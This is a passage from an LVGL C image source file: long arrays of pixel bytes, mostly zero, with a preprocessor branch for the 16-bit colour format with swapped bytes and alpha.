0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x76, 0xb5, 0x00, 0xff, 0xff, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, #endif #if LV_COLOR_DEPTH == 16 && LV_COLOR_16_SWAP != 0 /*Pixel format: Alpha 8 bit, Red: 5 bit, Green: 6 bit, Blue: 5 bit BUT the 2 color bytes are swapped*/ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x40, 0x00, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xff, 0xe0, 0x00, 0xff, 0x40, 0x0f, 0xff, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 0x40, 0x00, 0xff, 0x40, 0x00, 0xfe, 0xe0, 0x00, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x40, 0x00, 0xff, 0x40, 0x00, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0xff, 0xc0, 0x00, 0xff, 0x40, 0x23, 0xff, 0x60, 0x3c, 0xff, 0x60, 0x00, 0xff, 0xa0, 0x00, 0xff, 0x40, 0x20, 0xff, 0x20, 0xd4, 0xfe, 0xe0, 0x00, 0xff, 0x80, 0x00, 0xfe, 0x81, 0x00, 0xff, 0x40, 0x84, 0xff, 0xe0, 0x00, 0xff, 0x80, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x20, 0x00, 0xff, 0x60, 0x23, 0xff, 0x80, 0x0b, 0xff, 0x00, 0x00, 0xff, 0x60, 0x00, 0xff, 0x20, 0x7b, 0xff, 0x00, 0xff, 0xff, 0x81, 0x38, 0xff, 0x61, 0x00, 0xff, 0x20, 0xa7, 0xfe, 0xc0, 0xff, 0xff, 0x60, 0x84, 0xff, 0x40, 0x00, 0xff, 0x40, 0x58, 0xfe, 0xe0, 0xff, 0xff, 0x40, 0x5c, 0xff, 0x20, 0x00, 0xff, 0x60, 0x00, 0xff, 0x60, 0x2f, 0xff, 0x60, 0x20, 0xff, 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 